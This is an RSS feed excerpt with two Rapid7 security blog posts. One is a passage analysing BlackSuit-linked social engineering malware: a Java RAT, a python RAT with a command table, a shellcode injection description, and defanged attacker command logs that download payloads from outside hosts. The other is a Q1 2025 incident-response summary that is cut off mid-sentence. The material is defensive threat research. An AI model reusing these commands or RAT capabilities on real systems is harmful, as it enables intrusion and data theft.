data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt275a4221104818db/684c3b6e44bc4a6d61a88a84/blog-code-8.png" data-sys-asset-uid="blt275a4221104818db" data-sys-asset-filename="blog-code-8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-8.png" sys-style-type="display"/><em>Figure 19. Part of the `.ash_history` command log within the TinyCore VM.</em><p></p><p>In an alternate <span data-type='inlineCode'>tc.qcow2</span> payload observed by Rapid7, the TinyCore VM boot script will unconditionally execute two ELF files, <span data-type='inlineCode'>nossl</span> and <span data-type='inlineCode'>ssl</span>. These ELF payloads function as multi-threaded socks proxies, where the <span data-type='inlineCode'>ssl</span> copy uses the OpenSSL library to encrypt traffic and <span data-type='inlineCode'>ssl</span> sends traffic in plaintext. In both cases, the ELF payloads send registration information to the C2 proxy server on port 53, which is typically used for DNS.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte39a575158a93d48/684c3b6e343886b6d52ceef4/blog-code-9.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-9.png" asset-alt="blog-code-9.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte39a575158a93d48/684c3b6e343886b6d52ceef4/blog-code-9.png" data-sys-asset-uid="blte39a575158a93d48" data-sys-asset-filename="blog-code-9.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-9.png" sys-style-type="display"/><em>Figure 20. The ELF `nossl` begins execution by setting the C2 IPv4 address. Debugging symbols were left inside the file, which shows the original variable names.</em><em></em><em></em><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltaec05873e8fbc459/684c3b62343886b2e12ceeef/blog-code-10.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-10.png" asset-alt="blog-code-10.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltaec05873e8fbc459/684c3b62343886b2e12ceeef/blog-code-10.png" data-sys-asset-uid="bltaec05873e8fbc459" data-sys-asset-filename="blog-code-10.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-10.png" sys-style-type="display"/></p><em>Figure 21. The registration string sent by `nossl` to the C2 proxy server from within the TinyCore VM.</em><p></p><p>As shown below from the Black Basta chat leaks, BlackSuit has connections with the group, so the adaptation of their typical spear phishing attacks towards these types of social engineering attacks for initial access is unsurprising.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2fab79b62628bb27/684c41915a6d974b987d1faa/blog-chat-logs-8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-8.png" asset-alt="blog-chat-logs-8.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2fab79b62628bb27/684c41915a6d974b987d1faa/blog-chat-logs-8.png" data-sys-asset-uid="blt2fab79b62628bb27" data-sys-asset-filename="blog-chat-logs-8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-8.png" sys-style-type="display"/><em>Figure 22. One of Black Basta’s operators (@tinker) discusses their connection to a member of the BlackSuit ransomware group, with Black Basta’s leader (@usernamegg).</em><p></p><h3>Malware Testing</h3><p>After migrating the Java RAT’s functionality primarily to Google Drive, the threat actor developing the malware also began including the service account they use to test the malware within their own lab environment. The most recent versions of the RAT now also have the command <span data-type='inlineCode'>screen</span> which can download and execute a new Java class in memory. The threat actor first tested this in their own lab before trying it in infected devices that they had gained access to, as seen in the command logs below. Despite the name of the command and the name of the Java class that the test payload has (Screenshot), the payloads have varying functionality, but are generally intended to dynamically add new functionality to the RAT. The first test payload observed loads the Java class Screenshot, which then downloads a shellcode blob via a hard coded URL, and injects it into a new <span data-type='inlineCode'>java.exe</span> process using the WINAPI calls <span data-type='inlineCode'>VirtualAllocEx</span>, <span data-type='inlineCode'>WriteProcessMemory</span>, and <span data-type='inlineCode'>CreateRemoteThread</span>.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78a7c69b81333bc1/684c42164d81758611c8eda5/figure-23.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-23.png" asset-alt="figure-23.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78a7c69b81333bc1/684c42164d81758611c8eda5/figure-23.png" data-sys-asset-uid="blt78a7c69b81333bc1" data-sys-asset-filename="figure-23.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-23.png" sys-style-type="display"/><em>Figure 23. Injection logic implemented by one version of the dynamically loaded Java Screenshot class.</em><p></p><p>The analyzed test shellcode payload would then perform local PE injection for an embedded Rust PE using NTAPI calls, which for the purposes of the test appears to only spawn a confirmation message box. The Rust PE has an original filename of <span data-type='inlineCode'>testapp.exe</span>, a PDB named <span data-type='inlineCode'>testapp.pdb</span>, and was originally compiled on <span data-type='inlineCode'>2025-04-10T15:45:28Z</span>. Notably, the Rust PE did have the Windows Graphics Device Interface (GDI) library and several related function imports as dependencies, which could be used to access or manipulate the screen, but did not appear to be fully implemented yet.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4b4e78736d444da/684c421632b2811674fcaaf9/figure-24.png" height="187" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-24.png" asset-alt="figure-24.png" inline="true" width="310" max-width="310" max-height="187" style="max-width: 310px; width: 310px; max-height: 187px; height: 187px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4b4e78736d444da/684c421632b2811674fcaaf9/figure-24.png" data-sys-asset-uid="bltc4b4e78736d444da" data-sys-asset-filename="figure-24.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-24.png" sys-style-type="display"/><em>Figure 24. Test message box spawned by the Rust executable `testapp.exe`.</em><p></p><p>The screen command was then successfully used several times in compromised environments, though for different reasons. In one case the operator simply used it as a way to check the external IP address of the infected host. The command log below shows the threat actor testing the <span data-type='inlineCode'>screen</span> command for the first recorded time, using the payload with the embedded Rust PE, within their lab, shortly before starting a new spamming/social engineering attack run (during which they would distribute several copies of the malware).</p><p><span data-type='inlineCode'>Input@2025-04-23T17:12:32.203Z: screen hxxps://tesets[.]live/download/javacode.txt Output@2025-04-23T17-13-02.754Z: start shellcode done</span></p><p>In compromised environments however, the functionality was only observed in use as an external IP checking utility per the following command log.</p><p><span data-type='inlineCode'>Input@2025-05-07T17:36:59.102Z: screen hxxps://andrewjboyd[.]com/file/jc3_old_version.txt Output@2025-05-07T17-37-05.261Z: start shellcode done Input@2025-05-07T17:38:30.923Z: type c:\users\public\info.txt Output@2025-05-07T17-38-40.100Z: &lt;redacted_public_ipv4_address_for_compromised_system&gt;</span></p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfcb410699fdf4d88/684c42164c53c80b77e86eba/figure-25.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-25.png" asset-alt="figure-25.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfcb410699fdf4d88/684c42164c53c80b77e86eba/figure-25.png" data-sys-asset-uid="bltfcb410699fdf4d88" data-sys-asset-filename="figure-25.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-25.png" sys-style-type="display"/><em>Figure 25. One version of the Java Screenshot class implements functionality to retrieve the infected host’s external IP address and save it to a file named `info.txt`.</em><p></p><p>Rapid7 observed at least one other Rust malware payload, <span data-type='inlineCode'>updater.exe</span> being used by the threat actor, which appeared to be a custom loader for the SSH utility, containing the PDB name <span data-type='inlineCode'>rust_serverless_killer.pdb</span>. As many of the compromises facilitated by the social engineering attacks have resulted in SSH reverse tunnels being established to provide access, the loader is likely an attempt to evade detections targeting SSH commands by obscuring the related metadata. The SSH executable being loaded has the same functionality however, and as a result the command line arguments that must be passed remain the same.</p><p>The threat actor tested a variety of functionality for the Java RAT within their test lab. This includes the zipped python RAT the group would historically upload, decompress and execute (facilitated by the built in <span data-type='inlineCode'>send</span> and <span data-type='inlineCode'>extract</span> commands), or distribute instead of the Java RAT. The python RAT has a similar command menu to that of the Java RAT. The python RAT <a href="https://www.gdatasoftware.com/blog/2025/03/38161-analysis-fin7-anubis-backdoor">has also been previously analyzed by Gdata</a> with similar findings, who refer to it as Anubis (likely based on the source code) and attribute the malware to the FIN7 group.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt434380b373d40331/684c42165bb3f86677a3b346/figure-26.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-26.png" asset-alt="figure-26.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt434380b373d40331/684c42165bb3f86677a3b346/figure-26.png" data-sys-asset-uid="blt434380b373d40331" data-sys-asset-filename="figure-26.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-26.png" sys-style-type="display"/><em>Figure 26. The python RAT source labels the decrypted payload as “Anubis”.</em><em></em><em></em><p><span data-type='inlineCode'>InputStart@2025-03-28T13:31:01.430Z: checkconfig InputStart@2025-04-01T15:21:49.251Z: recive c:\programdata\video\log.txt InputStart@2025-04-03T17:01:26.653Z: send C:\Users\Public\Libraries\nature.zip extract C:\Users\Public\Libraries\nature.zip\qwerty dir c:\users\ InputStart@2025-03-28T14:01:17.825Z: checkconfig newconfig InputStart@2025-04-01T13:16:18.589Z: send C:\Users\Public\Libraries\nature.zip startsocks5 C:\Users\Public\Libraries\nature\debug.exe C:\Users\Public\Libraries\nature\test.py</span></p><p><br/>Several commands executed in the threat actor’s test lab can be seen above, where the python based payload was delivered via the Java RAT. In several past incidents handled by Rapid7 the name of initial payload archives containing python malware was <span data-type='inlineCode'>Cloud_Email_Switch.zip</span> and the script was named <span data-type='inlineCode'>conf.py</span>, where the script was executed via a copy of <span data-type='inlineCode'>pythonw.exe</span> that had its metadata stripped. The threat actor appears to have now moved to using the Java RAT primarily instead of the python version, although the Java payload retains the functionality to upload, extract, and execute python scripts.</p><table><colgroup data-width='797'><col style="width:31.367628607277293%"/><col style="width:68.63237139272272%"/></colgroup><thead><tr><th><p>Command</p></th><th><p>Function</p></th></tr></thead><tbody><tr><td><p>killexit</p></td><td><p>Immediately terminates the process.</p></td></tr><tr><td><p>ip</p></td><td><p>Creates a UDP socket targeting Google's DNS server (8.8.8[.]8) and connects to it to retrieve the machine’s local IP address.</p></td></tr><tr><td><p>‘cd ‘</p></td><td><p>Change the working directory to one specified by the C2.</p></td></tr><tr><td><p>‘gt ‘</p></td><td><p>Steal a specified file or directory. Reads and sends the content straight to the C2. If the target is a directory, the script will archive it into a zip file first.</p></td></tr><tr><td><p>‘up ‘</p></td><td><p>Upload a file sent by the C2, to the infected host, to a specified file path.</p></td></tr><tr><td><p>env</p></td><td><p>If the C2 specifies a 'list' command, the RAT returns all the existing environmental variables. Otherwise returns a specific variable chosen by the C2.</p></td></tr><tr><td><p>!cf!</p></td><td><p>Create/update a key (named via hard coded string) in the user’s registry using configuration data sent by the C2. Allows for the malware’s configuration to be dynamically updated.</p></td></tr><tr><td><p>!tcf!</p></td><td><p>Test C2 addresses supplied by the current C2 in a new config, by creating a TCP socket to attempt to connect to the new address(es) supplied. Returns the result to current C2. Doesn’t update the config.</p></td></tr><tr><td><p>default</p></td><td><p>If one of the above commands is not present, create a child console process (cmd.exe) to execute the contents received from the C2 and return stdout.</p></td></tr></tbody></table><p>Table 2. Command key for the python RAT.</p><p>Among the output of the commands the threat actor ran in their test lab, we can also see a listing of their Downloads directory. The output shows that they have likely been developing Rust malware since at least <span data-type='inlineCode'>2024-09-21</span>. The test lab is most likely also the environment in which they compiled <span data-type='inlineCode'>testapp.exe</span> as Rust executables contain cargo references which include the user’s name, for example: <span data-type='inlineCode'>C:\Users\User\.cargo\registry\src\&lt;truncated&gt;</span>. In contrast, <span data-type='inlineCode'>updater.exe</span>, the Rust SSH loader previously mentioned, references the user <span data-type='inlineCode'>lucak</span>.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7562ba5aa3bcf55/684c4216973009ed1e6c3d06/figure-27.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="figure-27.png" asset-alt="figure-27.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7562ba5aa3bcf55/684c4216973009ed1e6c3d06/figure-27.png" data-sys-asset-uid="bltd7562ba5aa3bcf55" data-sys-asset-filename="figure-27.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="figure-27.png" sys-style-type="display"/><em>Figure 27. A listing of the Downloads directory on an asset within the malware developer’s test lab.</em><p></p><p>Finally, while setting up the testing environment, the threat actor made changes to several Google Drive files from what appears to be a personal Gmail account: <span data-type='inlineCode'>palomo************[@]gmail[.]com</span>. These changes were visible as numerous versions of the Java RAT were distributed with the threat actor’s test lab Google Drive service account credentials included.</p><h2>Mitigation Guidance</h2><p>Rapid7 recommends taking the following precautions to limit exposure to these types of attacks:</p><p>Restrict the ability for external users to contact users via Microsoft Teams to the greatest extent possible. This can be done for example by blocking all external domains or creating a white/black list. Microsoft Teams will allow all external requests by default. For more information, see this reference.<br/>Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution.<br/>Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures to enable them to spot and report suspicious requests.<br/>Standardize VPN access. Traffic from known low cost VPN solutions should be blocked at a firewall level if there is no business use case.<br/>Require Multi-Factor Authentication (MFA) across the environment. Single factor authentication facilitates a large number of compromises. For example, If an attacker steals a user’s credentials and acquires the network’s VPN configuration, no MFA on the VPN allows them to easily access the environment.<br/>Regularly update software and firmware. Ransomware groups like Black Basta are known to purchase exploits for initial access.</p><h2>Rapid7 Customers</h2><p>InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity:</p><table><thead><tr><th><p>Detections</p></th></tr></thead><tbody><tr><td><p>Suspicious Chat Request - Potential Social Engineering Attempt</p></td></tr><tr><td><p>Initial Access - Potential Social Engineering Session Initiated Following Chat Request</p></td></tr><tr><td><p>Attacker Technique - Base64 String Added to HKCU Registry Key</p></td></tr><tr><td><p>Suspicious Process - LNK Executes PowerShell via JAR</p></td></tr><tr><td><p>Suspicious Process - QEMU Loads Disk From Staging Directory</p></td></tr><tr><td><p>Credential Access - Steal or Forge Kerberos tickets</p></td></tr><tr><td><p>Anomaly Detection - Failed AS-REP Roasting Attack</p></td></tr><tr><td><p>Non-Approved Application - Remote Management and Monitoring (RMM) Tools</p></td></tr></tbody></table><h2>MITRE ATT&CK Techniques</h2><table><thead><tr><th><p>Tactic</p></th><th><p>Technique</p></th><th><p>Procedure</p></th></tr></thead><tbody><tr><td><p>Reconnaissance</p></td><td><a href="https://attack.mitre.org/techniques/T1591/">T1591: Gather Victim Org Information</a></td><td><p>Operators utilize publicly available information to identify target contact details and financial information.</p></td></tr><tr><td><p>Resource Development</p></td><td><a href="https://attack.mitre.org/techniques/T1587/001/">T1587.001: Develop Capabilities: Malware</a></td><td><p>The threat actors are actively developing new malware to distribute.</p></td></tr><tr><td><p>Impact</p></td><td><a href="https://attack.mitre.org/techniques/T1498/">T1498: Network Denial of Service</a></td><td><p>The threat actors overwhelm email protection solutions with spam.</p></td></tr><tr><td><p>Impact</p></td><td><a href="https://attack.mitre.org/techniques/T1486/">T1486: Data Encrypted for Impact</a></td><td><p>The threat actors historically either deploy ransomware after compromising a network, or sell the access to a ransomware group.</p></td></tr><tr><td><p>Initial Access</p></td><td><a href="https://attack.mitre.org/techniques/T1566/004/">T1566.004: Phishing: Spearphishing Voice</a></td><td><p>The threat actors call impacted users and pretend to be a member of the target organization’s IT team to gain remote access.</p></td></tr><tr><td><p>Defense Evasion</p></td><td><a href="https://attack.mitre.org/techniques/T1140/">T1140: Deobfuscate/Decode Files or Information</a></td><td><p>The threat actors decrypt some zip archive payloads with a password, onto infected hosts.</p></td></tr><tr><td><p>Defense Evasion</p></td><td><a href="https://attack.mitre.org/techniques/T1055/002/">T1055.002: Process Injection: Portable Executable Injection</a></td><td><p>Some payloads executed by the threat actors utilize local PE injection.</p></td></tr><tr><td><p>Defense Evasion</p></td><td><a href="https://attack.mitre.org/techniques/T1620/">T1620: Reflective Code Loading</a></td><td><p>Some payloads executed by the threat actors load and execute shellcode.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1649/">T1649: Steal or Forge Authentication Certificates</a></td><td><p>The threat actors have abused ADCS services to acquire certificates.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1056/001/">T1056.001: Input Capture: Keylogging</a></td><td><p>The threat actors run an executable that can harvest the user’s credentials.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1558/003/">T1558.003: Steal or Forge Kerberos Tickets: Kerberoasting</a></td><td><p>The threat actors have performed Kerberoasting after gaining initial access.</p></td></tr><tr><td><p>Credential Access</p></td><td><a href="https://attack.mitre.org/techniques/T1558/004/">T1558.004: Steal or Forge Kerberos Tickets: AS-REP Roasting</a></td><td><p>The threat actors have performed AS-REP roasting attacks after gaining initial access.</p></td></tr><tr><td><p>Discovery</p></td><td><a href="https://attack.mitre.org/techniques/T1033/">T1033: System Owner/User Discovery</a></td><td><p>The threat actors enumerate asset and user information within the environment after gaining access.</p></td></tr><tr><td><p>Command and Control</p></td><td><a href="https://attack.mitre.org/techniques/T1572/">T1572: Protocol Tunneling</a></td><td><p>The threat actors use SSH reverse tunnels to provide/proxy remote access.</p></td></tr><tr><td><p>Command and Control</p></td><td><a href="https://attack.mitre.org/techniques/T1219/">T1219: Remote Access Software</a></td><td><p>The threat actors have used QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level, and more, to facilitate remote access.</p></td></tr></tbody></table><h2>Indicators of Compromise</h2><p>All indicators of compromise are <a href="https://github.com/rapid7/Rapid7-Labs/blob/main/IOCs/blacksuit_socialengineering/2025-06-10_iocs.txt">available at the Rapid7 GitHub repository</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict</link>
      <guid isPermaLink="false">bltc10ce8e9a011b3e9</guid>
      <category><![CDATA[Incident Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Ransomware]]></category>
      <category><![CDATA[Malware]]></category><dc:creator><![CDATA[Tyler McGraw]]></dc:creator>
      <pubDate>Tue, 10 Jun 2025 00:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Q1 2025 Incident Response Findings]]></title>
      <description><![CDATA[<p>Rapid7’s Q1 2025 incident response data highlights several key initial access vector (IAV) trends, shares salient examples of incidents investigated by the <a href="https://www.rapid7.com/services/incident-response/">Rapid7 Incident Response (IR)</a> team, and digs into threat data by industry as well as some of the more commonly seen pieces of malware appearing in incident logs.</p><p>Is having no MFA solution in place still one of the most appealing vulnerabilities for threat actors? Will you see the same assortment of malware regardless of whether you work in business services or media and communications? And how big a problem could one search engine query possibly be, anyway?<br/><br/>The answer to that last question is “very,” as it turns out. As for the rest…</p><h2><strong>I</strong>nitial access vectors</h2><p>Below, we highlight the key movers and shakers for IAVs across cases investigated by Rapid7’s IR team. While you’ll notice a fairly even split among several vectors such as exposed remote desktop protocol (RDP) services and SEO poisoning, one in particular is clearly the leader of the pack where compromising organizations is concerned: stolen credentials to valid/active accounts with no <a href="https://www.rapid7.com/fundamentals/multi-factor-authentication-mfa/">multi-factor authentication (MFA)</a> enabled.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6764bbc2b313c30c/6847f53f919439824fb365e6/blog-incidentfindings-1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-1.png" asset-alt="blog-incidentfindings-1.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6764bbc2b313c30c/6847f53f919439824fb365e6/blog-incidentfindings-1.png" data-sys-asset-uid="blt6764bbc2b313c30c" data-sys-asset-filename="blog-incidentfindings-1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-1.png" sys-style-type="display"/></p><p>Valid account credentials — with no MFA in place to protect the organization should they be misused — are still far and away the biggest stumbling block for organizations investigated by the Rapid7 IR team, occurring in 56% of all incidents this first quarter.</p><p>Exposed RDP services accounted for 6% of incidents as the IAV, yet they were abused by attackers more generally in 44% of incidents. This tells us that third parties remain an important consideration in an organization’s security hygiene.</p><h2>Valid accounts / no MFA: Top of the class</h2><p>Rapid7 <a href="https://www.rapid7.com/blog/post/2025/04/10/password-spray-attacks-taking-advantage-of-lax-mfa/">regularly bangs the drum</a> for tighter controls where valid accounts and MFA are concerned. As per the key findings, 56% of all incidents in Q1 2025 involved valid accounts / no MFA as the initial access vector. In fact, there’s been very little change since Q3 2024, and as good as no difference between the last two quarters:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4f46e3b26024da70/6847f5814fb4705d9b83c633/blog-incidentfindings-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-2.png" asset-alt="blog-incidentfindings-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4f46e3b26024da70/6847f5814fb4705d9b83c633/blog-incidentfindings-2.png" data-sys-asset-uid="blt4f46e3b26024da70" data-sys-asset-filename="blog-incidentfindings-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-2.png" sys-style-type="display"/></p><h2>Vulnerability exploitation: Cracks in the armor</h2><p>Rapid7’s IR services team observed several vulnerabilities used, or likely to have been used, as an IAV in Q1 2025. CVE-2024-55591 for example, the IAV for an incident in manufacturing, is a websocket-based race condition authentication bypass affecting Fortinet's FortiOS and FortiProxy flagship appliances. Successful exploitation results in the ability to execute arbitrary CLI console commands as the super_admin user. The <a href="https://www.fortiguard.com/psirt/FG-IR-24-535">CVE-2024-55591 advisory</a> was published at the beginning of 2025, and it saw widespread exploitation in the wild.<br/><br/>One investigation revealed attackers using the above flaw to exploit vulnerable firewall devices and create local and administrator accounts with legitimate-looking names (e.g., references to “Admin”, “I.T.”, “Support”). This allowed access to firewall dashboards, which may have contained useful information about the devices’ users, configurations, and network traffic. Policies were created which allowed for leveraging of remote VPN services, and the almost month-long dwell time observed in similar incidents may suggest initial access broker (IAB) activity, or a possible intended progression to data exfiltration and ransomware.</p><h2>Exposed RMM tooling: A path to ransomware</h2><p>As noted above, 6% of IAV incidents were a result of exposed remote monitoring and management (RMM) tooling. RMMs, used to remotely manage and access devices, are often used to gain initial access, or form part of the attack chain leading to ransomware.</p><p>One investigation revealed a version of SimpleHelp vulnerable to several critical privilege escalation and remote code execution vulnerabilities, which included CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728.</p><p>These CVEs target the SimpleHelp remote access solution. Exploiting CVE-2024-57727 permits an unauthenticated attacker to leak SimpleHelp "technician" password hashes. If one is cracked, the attacker can log-in as a remote-access technician. Lastly, the attacker can exploit CVE-2024-57726 and CVE-2024-57728 to elevate to SimpleHelp administrator and trigger remote code execution, respectively. CVE-2024-57727 was <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-57727&amp;field_date_added_wrapper=all&amp;field_cve=&amp;sort_by=field_date_added&amp;items_per_page=20&amp;url=">added to CISA KEV</a> in February 2025.<br/><br/>The vulnerable RMM solution was used to gain initial access and threat actors used PowerShell to create Windows Defender exclusions, with the ultimate goal of deploying INC Ransomware on target systems.</p><h2>SEO poisoning: When a quick search leads to disaster</h2><p>SEO poisoning, once the scourge of search engines everywhere, may not be high on your list of priorities. However, it still has the potential to wreak havoc on a network. Here, the issue isn’t so much rogue entries in regular search results, but instead the paid sponsored ads directly above typical searches. Note how many sponsored results sit above the genuine site related to this incident:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ad9e90005e3be26/6847f5c5af1830df2be6dc5c/blog-incidentfindings-3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-3.png" asset-alt="blog-incidentfindings-3.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ad9e90005e3be26/6847f5c5af1830df2be6dc5c/blog-incidentfindings-3.png" data-sys-asset-uid="blt1ad9e90005e3be26" data-sys-asset-filename="blog-incidentfindings-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-3.png" sys-style-type="display"/></p>Multiple sponsored searches above the official (and desired) search result<p></p><p>This investigation revealed a tale of two search results, where one led to a genuine download of a tool designed to monitor virtual environments, and the other led to malware. When faced with both options, a split-second decision went with the latter and what followed was an escalating series of intrusion, data exfiltration and—eventually—ransomware.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt904bf63c4742561d/6847f5e89224f630c1ea7a52/blog-incidentfindings-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-4.png" asset-alt="blog-incidentfindings-4.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt904bf63c4742561d/6847f5e89224f630c1ea7a52/blog-incidentfindings-4.png" data-sys-asset-uid="blt904bf63c4742561d" data-sys-asset-filename="blog-incidentfindings-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-4.png" sys-style-type="display"/>An imitation website offering malware disguised as genuine software<p></p><p>On the same day of initial compromise, the attacker moved laterally using compromised credentials via RDP, installing several RMM tools such as AnyDesk and SplashTop. It is likely that the threat actor searched for insecurely stored password files and targeted password managers. They also attempted to modify and/or disable various security tools in order to evade detection, and create a local account to enable persistence and avoid domain-wide password resets.<br/><br/>An unauthorized version of WinSCP was used to exfiltrate a few hundred GB of sensitive company data from several systems, and with this mission accomplished only a few tasks remained. The first: attempting to inhibit system recovery by tampering with the Volume Shadow Copy Service (VSS), clearing event logs, deleting files, and also attempting to target primary backups for data destruction. The second: deployment of Qilin ransomware and a blackmail note instructing the victim to communicate via a TOR link lest the data be published to their leak site.<br/><br/>Qilin ranked 7 in our <a href="https://www.rapid7.com/blog/post/2025/04/08/2025-ransomware-business-as-usual-business-is-booming/">top ransomware groups of Q1 2025</a> for leak post frequency, racking up 111 posts from January through March. Known for double-extortion attacks across healthcare, manufacturing, and financial sectors, Qilin (who, despite their name, are known not to be Chinese speakers, but rather Russian-speaking) has also recently been seen deployed by <a href="https://www.bleepingcomputer.com/news/security/microsoft-north-korean-hackers-now-deploying-qilin-ransomware/">North Korean threat actors Moonstone Sleet</a>.</p><h2>Attacker behavior observations</h2><h3>Bunnies everywhere: Tracking a top malware threat</h3><p>BunnyLoader, the Malware as a Service (MaaS) loader possessing a wealth of capabilities including clipboard and credential theft, keylogging, and the ability to deploy additional malware, is one of the most prolific presences Rapid7 has seen this first quarter of 2025. In many cases, it’s also daisy-chained to many of the <em>other</em> payloads and tactics which make repeated appearances.<br/><br/>To really drive this message home: BunnyLoader is the most observed payload across almost every industry we focused on. Whether we’re talking manufacturing, healthcare, business services or finance, it’s typically well ahead of the rest of the pack. Here are our findings across the 5 most targeted industries of Q1:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8b11fdaa0b340c67/6847f6059621d976564d3c6e/blog-incidentfindings-5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-incidentfindings-5.png" asset-alt="blog-incidentfindings-5.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8b11fdaa0b340c67/6847f6059621d976564d3c6e/blog-incidentfindings-5.png" data-sys-asset-uid="blt8b11fdaa0b340c67" data-sys-asset-filename="blog-incidentfindings-5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-incidentfindings-5.png" sys-style-type="display"/></p><p>BunnyLoader is in pole position not only for the 5 industries shown above, but across 12 of 13 industries overall, with 40% of <em>all</em> incidents observed involving this oft-updated malware.</p><p>Just over half of that 40% total involved a fake CAPTCHA (commonly used for the purpose of victims executing malicious code), with malicious / compromised sites appearing in a quarter of BunnyLoader cases. Rogue documents, which may be booby-trapped with malware or pave the way for potential phishing attacks, bring up the rear at just 9% of all BunnyLoader appearances recorded. First offered for sale in 2023 for a <a href="https://x.com/DailyDarkWeb/status/1699090008827990058">lifetime-use cost of $250</a>, its continued development and large range of features make it an attractive proposition for rogues operating on a budget.</p><h3>Targeted organizations: The manufacturing magnet</h3><p>Manufacturing organizations were targeted in more than 24% of incidents the Rapid7 IR team observed, by far the most targeted industry in Q1 based on both <a href="https://www.rapid7.com/blog/post/2025/04/08/2025-ransomware-business-as-usual-business-is-booming/">Rapid7’s ransomware analytics</a> and IR team observations. The chart below compares Rapid7’s industry-wide data (comprising a wide range of payloads and tactics) with ransomware leak post specific data. In both cases, manufacturing is a fair way ahead of other industries; this reflects its status as one of the most popular targets for 